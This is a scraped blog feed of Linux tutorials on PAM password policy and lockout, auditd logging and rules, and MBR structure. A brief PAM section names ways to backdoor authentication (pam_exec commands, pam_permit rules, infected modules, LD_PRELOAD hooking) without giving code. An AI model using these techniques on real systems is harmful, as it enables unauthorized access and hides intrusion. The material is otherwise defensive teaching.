So we\u0026rsquo;ll now inspect the rules mentioned in /etc/pam.d/system-auth file.\n$ cat /etc/pam.d/system-auth #%PAM-1.0 # This file is auto-generated. # User changes will be destroyed the next time authconfig is run. auth required pam_env.so auth required pam_faildelay.so delay=2000000 auth sufficient pam_unix.so nullok try_first_pass auth requisite pam_succeed_if.so uid \u0026gt;= 1000 quiet_success auth required pam_deny.so account required pam_unix.so account sufficient pam_localuser.so account sufficient pam_succeed_if.so uid \u0026lt; 1000 quiet account required pam_permit.so password requisite pam_pwquality.so try_first_pass local_users_only retry=3 authtok_type= password sufficient pam_unix.so sha512 shadow nullok try_first_pass use_authtok password required pam_deny.so session optional pam_keyinit.so revoke session required pam_limits.so -session optional pam_systemd.so session [success=1 default=ignore] pam_succeed_if.so service in crond quiet use_uid session required pam_unix.so Only the password type is relevant for our intended task out of all of these rules.\npassword requisite pam_pwquality.so try_first_pass local_users_only retry=3 authtok_type= password sufficient pam_unix.so sha512 shadow nullok try_first_pass use_authtok password required pam_deny.so requisite\tpam_pwquality.so try_first_pass local_users_only retry=3 authtok_type= This rule checks the quality of password using some predefined configuration that are mentioned in /etc/security/pwquality.conf or can be explicitely dictated via module arguments. The try_first_pass option tells to load the password from previous rule (if any), else this module will make prompt user for password. local_users_only option will tell pam_pwquality.so module to ignore the users that are not in the /etc/passwd file. retry option is the number of tries a user gets to pick an acceptable password before the module returns an error. 
By default, the prompt the user gets when entering their password is \u0026ldquo;New password:\u0026rdquo;. If the administrator sets authtok_type=FOO, the prompt becomes \u0026ldquo;New FOO password:\u0026rdquo;. Here the default behaviour will be expected.\nsufficient pam_unix.so sha512 shadow nullok try_first_pass use_authtok For pam_unix, the sha512 option means use a password hashing routine based on the SHA512 algorithm. blowfish is also supported along with several other, less secure, choices. The shadow option means maintain password hashes in a separate /etc/shadow file that is only readable by the root user. This option should always be set. nullok means allow user accounts that have null password entries. Personally, I would recommend removing this option.\nrequired pam_deny.so If the above modules failed, this should return with a deny message.\nNow, say you want to enforce the following policy\u0026hellip;\n- prompt 2 times for password in case of an error (retry option) - 12 characters minimum length - at least 6 characters should be different from old password when entering a new one (difok option) - at least 1 digit (dcredit option) - at least 1 uppercase (ucredit option) - at least 1 lowercase (lcredit option) - at least 1 other character (ocredit option) - cannot contain the words \u0026quot;qwerty\u0026quot; and \u0026quot;password\u0026quot; - enforce the policy for root as well. \u0026hellip; necessary changes that are needed to make are as below\npassword requisite pam_pwquality.so try_first_pass local_users_only retry=2 minlen=12 difok=6 dcredit=-1 ucredit=-1 ocredit=-1 lcredit=-1 [badwords=qwerty password] enforce_for_root password sufficient pam_unix.so sha512 shadow nullok try_first_pass use_authtok password required pam_deny.so The changes to the system-auth file described above will affect all applications that rely on that rule file. 
If changes are made to the passwd file, they will only affect the passwd utility.\nWe can also use the authconfig utility to make nearly all of these changes without having to interact directly with the associated files. More information can be found here . 3\nlock out at multiple failed attempts We can also use PAM to configure the system so that if a single user makes multiple failed attempts, PAM will lock out that user for a set period of time. Similarly to how your mobile device locks out the user for the next few hours if multiple login attempts fail.\nThis is possible with the pam_faillock module. Because this version of the module has no dedicated config file, all configuration will be done through module arguments. You can either manually edit the rule files with your favourite text editor or use the authconfig utility to make changes.\nBefore you begin, you must determine whether or not pam_faillock is enabled. This can be verified using\nauthconfig --test | grep pam_faillock For me the default output was\npam_faillock is disabled (deny=4 unlock_time=1200) So I had to enable it via authconfig --enablefaillock and along with that you can pass module arguments via the authconfig --faillockargs=\u0026lt;module_options\u0026gt; flag.\nOr, one can combine both of the actions in a single command like\nauthconfig --enablefaillock --faillockargs=\u0026#34;fail_interval=30 deny=3 unlock_time=3600\u0026#34; --update The above command will add the pam_faillock rule to all of the relevant rules files (located in the /etc/pam.d/ directory). And the --faillockargs value will configure the behaviour of the pam_faillock module. 
All of the module options can be checked with man pam_faillock.\nNow the output of the below command is slightly different.\nauthconfig --test | grep pam_faillock Output:\npam_faillock is enabled (fail_interval=30 deny=3 unlock_time=3600) You can list the failed login attempts with the faillock command.\nTTY auditing ( *cough* keylogging *cough*) The audit system (in Redhat or similar linux distros) uses the pam_tty_audit PAM module for auditing of TTY input. When a user logs in, this module logs all keystrokes that the user makes to the /var/log/audit/audit.log file.\nThis depends on the auditd service, which must be configured and running properly.\nThere is no authconfig flag that can enable this (at least, there is none in centos 7.5), so we\u0026rsquo;ll have to follow the traditional way of editing files manually to configure it.\nThis module only provides support for the session type. That means we can only add session rules to our required files and it\u0026rsquo;ll take effect immediately for that service.\nMy idea is to add this rule in /etc/pam.d/system-auth and /etc/pam.d/password-auth.\nsession required pam_tty_audit.so enable=* The above rule will capture all of the tty input as it is and store it in the /var/log/audit/audit.log file (by default). You can easily grep stuff from that or use a proper tool to query the logs\u0026hellip; like aureport.\nThe aureport --tty command filters all TYPE=tty log events from the file and displays them in a very human readable format.\nbackdooring Till this point, we have learnt a lot about PAM and it is time to rethink the basics once again. PAM has 3 components: user, password and service. Its role is to authenticate a user to a service with the provided password.\nIt works elegantly with the help of some service files with the same name as the service itself. These files are located in the /etc/pam.d/ directory. 
Each file has one or more rules that helps PAM to take proper decisions.\nThere are a lot of methods with which we can backdoor the PAM system. One of the many ways is to use pam_exec.so module to run an arbitrary command at each PAM based event. Another way could be to add rule using pam_permit.so module, that will skip the required checks to authenticate user for that service.\nThe above techniques are very noisy and are easily detected. More sophesticated attacks would include replacing the original module with custom compiled infected module on target system\u0026hellip; or function hooking via LD_PRELOAD technique.\nI\u0026rsquo;ll leave the practical part upto you. Please don\u0026rsquo;t do anything stupid or unethical on production server or any other system without the owner\u0026rsquo;s consent.\nKeep it healthy and stay safe!!\nResources: https://likegeeks.com/linux-pam-easy-guide/ https://aplawrence.com/Basics/understandingpam.html https://www.linux.com/news/understanding-pam/ https://developer.ibm.com/tutorials/l-pam/ https://github.com/linux-pam/linux-pam (Source code) https://wiki.archlinux.org/title/PAM#Examples https://lwn.net/Articles/470764/ (A look at PAM face-recognition authentication) https://lwn.net/Articles/523199/ (Google Authenticator for multi-factor authentication) https://github.com/linux-pam/linux-pam/blob/b872b6e68a60ae351ca4c7eea6dfe95cd8f8d130/libpam/include/security/_pam_types.h#L29\u0026#160;\u0026#x21a9;\u0026#xfe0e;\n(https://stackoverflow.com/questions/32455684/difference-between-real-user-id-effective-user-id-and-saved-user-id)\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/system-level_authentication_guide/authconfig-pwd#authconfig-pwd-cmd\u0026#160;\u0026#x21a9;\u0026#xfe0e;\n","permalink":"https://ayedaemon.github.io/post/2022/12/pluggable-authentication-modules-linux/","summary":"PAM - What and Why Authenticating a user to a service used to be a 
time-consuming process. The application had to be aware of all possible authentication mechanisms and had to be rebuilt every time a new authentication method was introduced\u0026hellip; As a result, there was a significant amount of code repetition. Naturally, it was disliked by everyone!!\nAs a result, the concept of a middle-ware application responsible for user authentication to a service arose.","title":"Pluggable Authentication Modules - Linux"},{"content":"Audits are critical for system administrators to detect security violations and track security-relevant information on their systems. Anyone concerned about the security, stability, and proper operation of their Linux servers should conduct an audit.\nHow to do auditing in linux One simple way is to use the history command to observe the shell\u0026rsquo;s history, but this has many limitations. One of them is that this command is only applicable to the current user. You can still get around this by reading the .bash_history file in each user\u0026rsquo;s home directory (given you have permissions to do so).\nAudit framework in kernel. The Linux audit framework is a better option. Because it operates at the kernel level, it has a lot of visibility over almost everything. The Linux kernel sends significant events to user-space (auditd) so that they can be recorded in a file. This file can then be analysed on the host system or sent to a remote location for storage and analysis.\nUser-space auditd The majority of Linux distributions come with auditd preinstalled, which begins and stops with the system (as a systemd service file). 
Using the command below, you can determine whether the kernel was built with the audit options.\ngrep -i audit /boot/config-`uname -r` On my system, it gives me the output below (indicating the kernel was built with the auditing feature)\nCONFIG_AUDIT_ARCH=y CONFIG_AUDIT=y CONFIG_AUDITSYSCALL=y CONFIG_AUDIT_WATCH=y CONFIG_AUDIT_TREE=y CONFIG_NETFILTER_XT_TARGET_AUDIT=m CONFIG_IMA_AUDIT=y CONFIG_KVM_MMU_AUDIT=y The second thing to check is whether the kernel thread responsible for sending data to user-space is running. Check that with the ps command.\nsudo ps -aux | grep -i kauditd This gives me the output below (indicating that the thread is running)\nroot 103 0.0 0.0 0 0 ? S 11:39 0:00 [kauditd] The final thing is to check the user-space service responsible for receiving the data from kauditd. To get a definitive answer on systemd systems, use the commands listed below.\nsystemctl is-active auditd ## Returns: active/inactive systemctl is-enabled auditd ## Returns: enabled/disabled (Note: Feel free to check the source code at kernel/audit.c. 1)\nConfiguring auditd Auditd decides what to log and what not to log using a set of rules. These rules can be found in the /etc/audit/rules.d/ folder. Auditd reads files from this folder on startup and generates the /etc/audit/audit.rules file automatically. (This file should not be edited by hand.)\nauditd comes with a configuration file too. This file controls the behaviour of the userspace auditd daemon. 
Default file on my system looks like below.\n# sudo cat -n /etc/audit/auditd.conf 1\t# 2\t# This file controls the configuration of the audit daemon 3\t# 4\t5\tlocal_events = yes 6\twrite_logs = yes 7\tlog_file = /var/log/audit/audit.log 8\tlog_group = root 9\tlog_format = RAW 10\tflush = INCREMENTAL_ASYNC 11\tfreq = 50 12\tmax_log_file = 8 13\tnum_logs = 5 14\tpriority_boost = 4 15\tdisp_qos = lossy 16\tdispatcher = /sbin/audispd 17\tname_format = NONE 18\t##name = mydomain 19\tmax_log_file_action = ROTATE 20\tspace_left = 75 21\tspace_left_action = SYSLOG 22\tverify_email = yes 23\taction_mail_acct = root 24\tadmin_space_left = 50 25\tadmin_space_left_action = SUSPEND 26\tdisk_full_action = SUSPEND 27\tdisk_error_action = SUSPEND 28\tuse_libwrap = yes 29\t##tcp_listen_port = 60 30\ttcp_listen_queue = 5 31\ttcp_max_per_addr = 1 32\t##tcp_client_ports = 1024-65535 33\ttcp_client_max_idle = 0 34\tenable_krb5 = no 35\tkrb5_principal = auditd 36\t##krb5_key_file = /etc/audit/audit.key 37\tdistribute_network = no Some of these options are easy to understand, like:\nlog_file : Tells the location of the audit log file. max_log_file : Defines the size of the log file in MB. If the size is reached, max_log_file_action is triggered. space_left : Triggers the space_left_action when the limit is reached. To include additional information in audit logs you need to change log format from RAW to ENRICHED. FLUSH = INCREMENTAL_ASYNC will write the logs async instead of writing them on every write. While some of them needs more detailed explaination. In any case, always refer the man pages \u0026ndash;\u0026gt; man (5) auditd.conf 2. There you will find all the possible options and their supporting values to tune auditd as per your requirements.\nAfter making changes to auditd.conf, restart the service to pick up new changes from config. My centos 7 machine did not allow me to manually restart the service using systemctl but it worked just fine with service auditd restart. 
If you figure out why this happens, please let me know!\nInspecting audit logs We can see where the auditd logs are stored from the config file above. So we can always look through the log files and use the good old grep command to find what we\u0026rsquo;re looking for.\nBut that is not the intended method. The audit package includes a number of helper commands to assist the sysadmin/analyst in quickly determining information from logs.\nBelow are all the binary executable files provided by the audit package\u0026hellip;.\n## COMMAND: rpm -ql audit | grep bin /sbin/audispd /sbin/auditctl /sbin/auditd /sbin/augenrules /sbin/aureport /sbin/ausearch /sbin/autrace /usr/bin/aulast /usr/bin/aulastlog /usr/bin/ausyscall /usr/bin/auvirt Let\u0026rsquo;s start with ausearch for now. This program parses the audit log files and gives the information based on passed keywords.\nThere are a lot of options for this tool.. I\u0026rsquo;ll mention few which I use most often.\n-i \u0026ndash; Interpret the logs. Translates numeric value in names. If you want to get raw logs, use -r. use -x to search based on executable name. If you know the event ID then search with -a. To search with message type, use -m. You can get the message type list by passing nothing or a wrong message type with the argument/flag. Use -k to search for specific key in log. You can configure your own key in the logs config. These keys helps to corelate the logs with the rules. 
If you just want to get a report of everything that was logged, you can use aureport program which gives you a proper summary in a tabular form.\n## COMMAND: sudo aureport Summary Report ====================== Range of time in logs: 01/01/1970 00:00:00.000 - 12/10/2022 16:24:29.088 Selected time for report: 01/01/1970 00:00:00 - 12/10/2022 16:24:29.088 Number of changes in configuration: 2 Number of changes to accounts, groups, or roles: 0 Number of logins: 0 Number of failed logins: 0 Number of authentications: 0 Number of failed authentications: 0 Number of users: 3 Number of terminals: 4 Number of host names: 1 Number of executables: 3 Number of commands: 1 Number of files: 0 Number of AVC\u0026#39;s: 0 Number of MAC events: 0 Number of failed syscalls: 0 Number of anomaly events: 0 Number of responses to anomaly events: 0 Number of crypto events: 0 Number of integrity events: 0 Number of virt events: 0 Number of keys: 0 Number of process IDs: 42 Number of events: 240 Writing custom audit rules auditd also allows us to write our own rules. These rules will be read and applied when the service is restarted\u0026hellip; or if you invoke augenrules --load.\nFor auditing, there are only three types of rules that can be defined:\nWatches on the file system (watches the changes related to filesystem or on a particular path)\nsyscalls (checks if a specific syscall was executed and with what context)\ncontrol rules (these are used to modify the kernel configuration of linux audit)\nThat\u0026rsquo;s all. This was all we needed to know before we started writing our first simple rule.\n-w /etc/ The above rule will watch for all kinds of changes in /etc/ folder\u0026hellip; that means any (r)ead, (w)rite, (e)xecute or (a)ttribute change operations will be logged.\nLet\u0026rsquo;s write the above rule in a new file: /etc/audit/rules.d/myrules.rules\u0026hellip; And check if it is picked up by auditd already. 
(I know it will not be picked, but it won\u0026rsquo;t hurt to check)\n# sudo auditctl -l No rules Now, let\u0026rsquo;s restart the service and try that again.\n# service auditd restart # sudo auditctl -l -w /etc -p rwxa auditd has now loaded the rule, as expected. But there\u0026rsquo;s more to it than just what we put in the file. It makes no difference, however, because it is implicitly adding -p rwxa to indicate that all of these operations should be monitored.\nThe files still contain what we added\u0026hellip; but the kernel has fully expanded rules.\n# sudo cat /etc/audit/rules.d/myrules.rules -w /etc/ # sudo cat /etc/audit/audit.rules ## This file is automatically generated from /etc/audit/rules.d -D -b 8192 -f 1 -w /etc/ With this rule in the kernel, all the operations made to /etc path will be recorded. To make things easy, think of all the watch rules as just fancy wrappers for syscall rules. Above rule can be written as below, and will still work the same.\n-a exit,always -F dir=/etc -F perm=rwxa Remove the previous rule and add the above rule to the same file. Restart the service again for the changes to take effect.\n$ sudo cat /etc/audit/audit.rules ## This file is automatically generated from /etc/audit/rules.d -D -b 8192 -f 1 -a exit,always -F dir=/etc -F perm=rwxa Auto-generated event is what we wrote in the file. Let\u0026rsquo;s take a look what it looks like from kernel point of view.\n$ sudo auditctl -l -w /etc -p rwxa Told you, its practically the same. Now let\u0026rsquo;s understand all the options in the new rule we wrote (obviously for better clarity on how it is same).\n-a exit,always -F dir=/etc -F perm=rwxa -a : append rule to end of the list exit,always : always log when exiting a syscall. -F : build a rule based on (F)ield values dir=/etc: full path of directory to watch; watches recursively to whole subtrees. perm=rwxa: permission changes/access to monitor. 
According to man 8 auditctl, if a field rule is given and no syscall is specified, it will default to all syscalls. That means the above rule will work for all of the syscalls.\nSo far so good. Now what about control rules?? ..Or let\u0026rsquo;s call them configuration rules, as they configure the behaviour of the audit system itself.\nRead the man page for a better and complete explanation. But I\u0026rsquo;ll walk you through the ones we have already seen\u0026hellip;. in the /etc/audit/audit.rules file.\n-D -b 8192 -f 1 -D deletes all the previous rules from the kernel rules list. This should always be at the top. If you want to give someone a hard time, just put it at the end. (please don\u0026rsquo;t do it on production machines, it won\u0026rsquo;t be funny)\n-b sets the size of the audit buffer. If you don\u0026rsquo;t know what you are doing, leave it at the default.\n-f sets the failure mode, which tells the kernel how to handle failures and critical errors. 0 is silent. Default is 1 (printk). Highly secured environments should use 2 (panic).\nPre-packaged audit rules Most of the time, we don\u0026rsquo;t really need to write our own audit rules; we can just use what other people have already worked on. 
You can always find them with the help of your favorite search engine\u0026hellip;but there are few already pre-packaged with audit and are already on your system (if you have installed the package)\n$ rpm -ql audit | grep \u0026#39;/usr/share/.*\\.rules$\u0026#39; /usr/share/doc/audit-2.8.5/rules/10-base-config.rules /usr/share/doc/audit-2.8.5/rules/10-no-audit.rules /usr/share/doc/audit-2.8.5/rules/11-loginuid.rules /usr/share/doc/audit-2.8.5/rules/12-cont-fail.rules /usr/share/doc/audit-2.8.5/rules/12-ignore-error.rules /usr/share/doc/audit-2.8.5/rules/20-dont-audit.rules /usr/share/doc/audit-2.8.5/rules/21-no32bit.rules /usr/share/doc/audit-2.8.5/rules/22-ignore-chrony.rules /usr/share/doc/audit-2.8.5/rules/23-ignore-filesystems.rules /usr/share/doc/audit-2.8.5/rules/30-nispom.rules /usr/share/doc/audit-2.8.5/rules/30-ospp-v42.rules /usr/share/doc/audit-2.8.5/rules/30-pci-dss-v31.rules /usr/share/doc/audit-2.8.5/rules/30-stig.rules /usr/share/doc/audit-2.8.5/rules/31-privileged.rules /usr/share/doc/audit-2.8.5/rules/32-power-abuse.rules /usr/share/doc/audit-2.8.5/rules/40-local.rules /usr/share/doc/audit-2.8.5/rules/41-containers.rules /usr/share/doc/audit-2.8.5/rules/42-injection.rules /usr/share/doc/audit-2.8.5/rules/43-module-load.rules /usr/share/doc/audit-2.8.5/rules/70-einval.rules /usr/share/doc/audit-2.8.5/rules/71-networking.rules /usr/share/doc/audit-2.8.5/rules/99-finalize.rules ( NOTE: The numbers in the filenames play a very important role. For auditd, the first rule found wins. So if there are 2 contradictory rules, the first one found will be applied and the second one will have no effect.)\nYou can copy these rules, or just the ones you want to monitor, to /etc/audit/rules.d/ folder and restart the service to pick up the new rules. Or you can use augenrules --load to load them without restarting the service.\nHardening the audit First step to harden the audit will be to ensude auditd\u0026rsquo;s configuration is immutable. 
This can be done with the -e 2 control rule. Enabling this will prevent further changes to the audit configuration. That being said, it is obvious that this should be the last rule in the list.\nThe next step would be to store the logs in a centralized, secure location. Auditd comes with a dispatcher program (audispd) that can work with the audisp-remote plugin. This plugin comes with its own configuration file, which can be found at /etc/audisp/audisp-remote.conf.\nThis package was not already installed on my system, so I installed it with sudo yum install -y audispd-plugins. Once this is installed, audisp-remote.conf will be there waiting for you to edit.\nThere are a few configuration changes you\u0026rsquo;ll need to make to ensure that logs are sent to the remote server. The overall concept is to collect logs using auditd, then use a plugin to send logs to a central server while also disabling local logging of the same logs. This way, we won\u0026rsquo;t have logs on the local system (saving disk space), and we can aggregate logs from multiple servers for analysis.\nLet\u0026rsquo;s make one change at a time. The first one is to enable the remote logging plugin. To do that, we can make changes to /etc/audisp/plugins.d/au-remote.conf.\n## CHANGE active status to yes active=yes Then let our audit dispatcher know about the remote server where we want to dispatch the logs. This change will be made to /etc/audisp/audisp-remote.conf\n## Remote server name/IP and the port remote_server = 192.168.56.10 port = 60 As a dirty trick, I\u0026rsquo;ve started netcat on port 60 of the remote server to listen to the incoming data from the host.\nThe last thing is to disable local logging for auditd. For that, make changes to /etc/audit/auditd.conf.\n## CHANGE write logs to no write_logs = no With this done, you have everything configured and ready to test. 
Now restart the auditd service and you\u0026rsquo;ll start getting logs in netcat screen on remote system.\nWrap-up In this article, you learnt about how to do better auditing of your linux environment, with the help of auditd. You also learnt about how to write your own rules or get pre-packaged rules to generate specific audit logs\u0026hellip; and ways to get required reports with the help of ausearch and aureport programs.\nThis article is not intended to be a complete guide for auditing. It\u0026rsquo;s whole purpose is to get you started with the idea of auditing and using the audit package utilities.\nIf you want to learn more about it, I suggest you to play around and read RedHat\u0026rsquo;s documentation on system auditing 3. And if you are stuck, use your favorite search engine or\u0026hellip; RTFM.\nhttps://elixir.bootlin.com/linux/latest/source/kernel/audit.c\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://www.man7.org/linux/man-pages/man5/auditd.conf.5.html\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/chap-system_auditing\u0026#160;\u0026#x21a9;\u0026#xfe0e;\n","permalink":"https://ayedaemon.github.io/post/2022/12/recording_system_events_with_auditd/","summary":"Audits are critical for system administrators to detect security violations and track security-relevant information on their systems. Anyone concerned about the security, stability, and proper operation of their Linux servers should conduct an audit.\nHow to do auditing in linux One simple way is to use the history command to observe the shell\u0026rsquo;s history, but this has many limitations. One of them is that this command is only applicable to the current user.","title":"Recording system events with auditd"},{"content":"Malware has been used numerous times by attackers to destroy a computer\u0026rsquo;s Master Boot Record, rendering it inoperable. 
By erasing the MBR, the machine is unable to load the operating system. There is no easy way to rewrite the Master Boot Record into place without an operating system, and the machine becomes completely useless and unrecoverable. In addition, many ransomware strains infect the master boot record by overwriting it with malicious code. The system is then automatically restarted to allow the infection to take place. When the system restarts, the user is locked out, and the ransomware displays a note demanding payment. Simple money!\nTo understand how all of this is possible, and how an attacker can achieve it, we must first understand the MBR and the process of its execution.\nThe boot process The booting procedure of a system has become simpler over time, but this does not always imply that it is any easier. Every computer, big or small, goes through a start-up procedure known as the \u0026ldquo;Boot\u0026rdquo; process. Because different types of hardware operate in different ways, the boot procedure is heavily influenced by the type of CPU architecture and other hardware components.\nTo avoid confusion, I won\u0026rsquo;t go into great detail about each stage of the booting process. However, a typical linux booting procedure involves the following phases at a higher level:\nPower Up\nThis is the step where you press the power button. This triggers the BIOS 1 from the motherboard\u0026rsquo;s flash memory to start executing its functions.\nPower On Self Test\nAfter the BIOS is up and running, it initiates a quick self test to check whether all the required hardware components are in working condition.\nFind a boot device\nThis step finds all the bootable devices among the hard drives detected earlier. It works by checking the MBR (Master Boot Record) of each detected device. MBR refers to the first 512 bytes of any bootable device.\nLoad the MBR\nMBR is the first 512 bytes. These 512 bytes contain a bootloader, a partition table and the magic number. 
This is loaded into ram and is responsible to read data from drives and start the operating system.\nLoad GRUB\nThis is a boot loader program which works in 2 stages. First stage is a small machine code binary on MBR. Its sole job is to locate the second stage boot loader and load it in memory. Once the second stage boot loader is in the memory, it presents the user with a graphical screen showing the different operating systems to choose from.\nKernel\nThe above OS selection decides what kernel and optional initramfs is to be loaded into memory. The kernel then initializes and configures the computer\u0026rsquo;s memory and configures the various hardware attached to the system, including all the I/O subsystems. After some more operations, the kernel is completely loaded into memory and is operational. It\u0026rsquo;s time to set up the user environment.\ninit\nThis is the first userspace program that is started by kernel. Now this starts and manages all the userspace processes like your web browser, file manager, web servers, etc.\nMBR and other little things Now that we are aware of how the boot procedure works, we can go on to the article\u0026rsquo;s main objective, the Master Boot Record. (but not this Master Boot Record)\nIf you\u0026rsquo;re not already aware, this is how a typical hard drive appears from the outside.\nThere are numerous components inside this small semi-metallic box that aid in its proper operation.\nBut we don\u0026rsquo;t need to know about all of these components; instead, we\u0026rsquo;ll concentrate on the disc-like structure in the centre. This is known as a platter. A platter is a single recording disc. A hard disc drive may have one or more platters.\nEach platter is divided into several circular tracks, and each track is further divided into several sectors. Each sector on a hard disc drive typically stores 512 bytes of user-accessible data.\nThe first 512 bytes (or first sector) of a hard drive is where the MBR is located. 
And since everything in Linux is a \u0026ldquo;file\u0026rdquo;, if we want to extract MBR data, all we have to do is to read the first 512 bytes of our bootable hard disk file and then write that content to another local file for further analysis. In most of the linux platforms, we can do this by dd 2 command.\ndd if=/dev/sda of=mbr.sample bs=512 count=1 The above command will read a 512-byte block (once) from /dev/sda and save it in the mbr.sample file. Then we can the check the type of this file using file command.\nfile mbr.sample ## Output # mbr.sample: x86 boot sector; partition 1: ID=0x83, active, starthead 32, startsector 2048, 2097152 sectors; partition 2: ID=0x8e, starthead 170, startsector 2099200, 41191424 sectors, code offset 0x63 An x86 boot sector is recognised in this file. Interestingly, it also lists the start head, start sector, total number of sectors, offset, and IDs of all the partitions. This was sufficient reason for me to dig up the file\u0026rsquo;s hexdump and understand how file command is able to gather all this information.\nhexdump -C mbr.sample Output:-\n00000000 eb 63 90 10 8e d0 bc 00 b0 b8 00 00 8e d8 8e c0 |.c..............| 00000010 fb be 00 7c bf 00 06 b9 00 02 f3 a4 ea 21 06 00 |...|.........!..| 00000020 00 be be 07 38 04 75 0b 83 c6 10 81 fe fe 07 75 |....8.u........u| 00000030 f3 eb 16 b4 02 b0 01 bb 00 7c b2 80 8a 74 01 8b |.........|...t..| 00000040 4c 02 cd 13 ea 00 7c 00 00 eb fe 00 00 00 00 00 |L.....|.........| 00000050 00 00 00 00 00 00 00 00 00 00 00 80 01 00 00 00 |................| 00000060 00 00 00 00 ff fa 90 90 f6 c2 80 74 05 f6 c2 70 |...........t...p| 00000070 74 02 b2 80 ea 79 7c 00 00 31 c0 8e d8 8e d0 bc |t....y|..1......| 00000080 00 20 fb a0 64 7c 3c ff 74 02 88 c2 52 be 05 7c |. 
..d|\u0026lt;.t...R..|| 00000090 b4 41 bb aa 55 cd 13 5a 52 72 3d 81 fb 55 aa 75 |.A..U..ZRr=..U.u| 000000a0 37 83 e1 01 74 32 31 c0 89 44 04 40 88 44 ff 89 |7...t21..D.@.D..| 000000b0 44 02 c7 04 10 00 66 8b 1e 5c 7c 66 89 5c 08 66 |D.....f..\\|f.\\.f| 000000c0 8b 1e 60 7c 66 89 5c 0c c7 44 06 00 70 b4 42 cd |..`|f.\\..D..p.B.| 000000d0 13 72 05 bb 00 70 eb 76 b4 08 cd 13 73 0d 5a 84 |.r...p.v....s.Z.| 000000e0 d2 0f 83 de 00 be 85 7d e9 82 00 66 0f b6 c6 88 |.......}...f....| 000000f0 64 ff 40 66 89 44 04 0f b6 d1 c1 e2 02 88 e8 88 |d.@f.D..........| 00000100 f4 40 89 44 08 0f b6 c2 c0 e8 02 66 89 04 66 a1 |.@.D.......f..f.| 00000110 60 7c 66 09 c0 75 4e 66 a1 5c 7c 66 31 d2 66 f7 |`|f..uNf.\\|f1.f.| 00000120 34 88 d1 31 d2 66 f7 74 04 3b 44 08 7d 37 fe c1 |4..1.f.t.;D.}7..| 00000130 88 c5 30 c0 c1 e8 02 08 c1 88 d0 5a 88 c6 bb 00 |..0........Z....| 00000140 70 8e c3 31 db b8 01 02 cd 13 72 1e 8c c3 60 1e |p..1......r...`.| 00000150 b9 00 01 8e db 31 f6 bf 00 80 8e c6 fc f3 a5 1f |.....1..........| 00000160 61 ff 26 5a 7c be 80 7d eb 03 be 8f 7d e8 34 00 |a.\u0026amp;Z|..}....}.4.| 00000170 be 94 7d e8 2e 00 cd 18 eb fe 47 52 55 42 20 00 |..}.......GRUB .| 00000180 47 65 6f 6d 00 48 61 72 64 20 44 69 73 6b 00 52 |Geom.Hard Disk.R| 00000190 65 61 64 00 20 45 72 72 6f 72 0d 0a 00 bb 01 00 |ead. Error......| 000001a0 b4 0e cd 10 ac 3c 00 75 f4 c3 00 00 00 00 00 00 |.....\u0026lt;.u........| 000001b0 00 00 00 00 00 00 00 00 70 7e 04 00 00 00 80 20 |........p~..... | 000001c0 21 00 83 aa 28 82 00 08 00 00 00 00 20 00 00 aa |!...(....... ...| 000001d0 29 82 8e fe ff ff 00 08 20 00 00 88 74 02 00 00 |)....... ...t...| 000001e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 000001f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 aa |..............U.| 00000200 Dissecting the Master Boot Record Without any knowledge of layout, simply looking at the hexdump output is not particularly helpful. 
Therefore, it is now necessary to understand the MBR layout.\nMBR consists of 3 parts - bootloader, partition table, and magic number.\nThe magic number is found in the final two bytes, unlike regular userspace files, where it usually sits at the start. The bytes appear as 55 AA in the file, but be mindful of the processor\u0026rsquo;s endianness. Since x86 is little endian, the least significant byte is stored first. As a result, the two bytes 55 AA are read as the 16-bit value 0xAA55, which is the magic number.\nAfter that is subtracted, we are left with 512-2 = 510 bytes. Out of these, the bootloader is stored in the first 446 bytes, and the partition table is stored in the remaining 64 bytes. To evaluate these components separately, let\u0026rsquo;s extract them into distinct files using the same old dd command.\n## Bootloader dd if=mbr.sample of=mbr.bootloader bs=1 count=446 ## Partition table (skip first 446 bytes) dd if=mbr.sample of=mbr.partition_table bs=1 count=64 skip=446 ## magic (skip first 510 bytes) dd if=mbr.sample of=mbr.magic bs=1 count=2 skip=510 ## Check file types file * ## Output # mbr.bootloader: data # mbr.magic: BIOS (ia32) ROM Ext. # mbr.partition_table: 8086 relocatable (Microsoft) # mbr.sample: x86 boot sector; partition 1: ID=0x83, active, starthead 32, startsector 2048, 2097152 sectors; partition 2: ID=0x8e, starthead 170, startsector 2099200, 41191424 sectors, code offset 0x63 It\u0026rsquo;s fantastic that the file command can recognise each of these MBR components separately. Now with separate files, we can carefully examine the partition table and determine what data it can give us.\nhexdump -C -v mbr.partition_table Output:-\n00000000 80 20 21 00 83 aa 28 82 00 08 00 00 00 00 20 00 |. !...(....... .| 00000010 00 aa 29 82 8e fe ff ff 00 08 20 00 00 88 74 02 |..)....... 
...t.| 00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| The MBR system only supports 4 primary partitions since partition tables actually only contain 4 records. We must divide a primary partition into smaller partitions and keep a separate partition table inside of that primary partition if we want to construct more than four partitions. The term \u0026ldquo;Expanded partitions\u0026rdquo; is in fact used to describe these extended partitions. We can see from the result above that there are a total of 64 bytes, giving us a total of 64/4 = 16 bytes for each record. Let\u0026rsquo;s understand the layout of these 16 bytes and then we can analyze the partition table data using hexdump.\nSize (in bytes) Purpose 1 Boot indicator (0x80 for active and 0x00 for inactive) 1 partition start: head 1 partition start: sector 1 partition start: cylinder 1 Partition ID 1 partition end: head 1 partition end: sector 1 partition end: cylinder 4 Number of sectors before the beginning of this partition (sectors_before) 4 Number of sectors in this partition (number_of_sectors) There are 16 bytes in all of that. Now we know where the information that the file command was displaying previously comes from.\nBased on the information we have now, we can figure out few things on our own\u0026hellip;\n00000000 80 20 21 00 83 aa 28 82 00 08 00 00 00 00 20 00 |. !...(....... .| 00000010 00 aa 29 82 8e fe ff ff 00 08 20 00 00 88 74 02 |..)....... ...t.| 00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| For example, this disk only has 2 partitions because the final 2 records are all zeros. 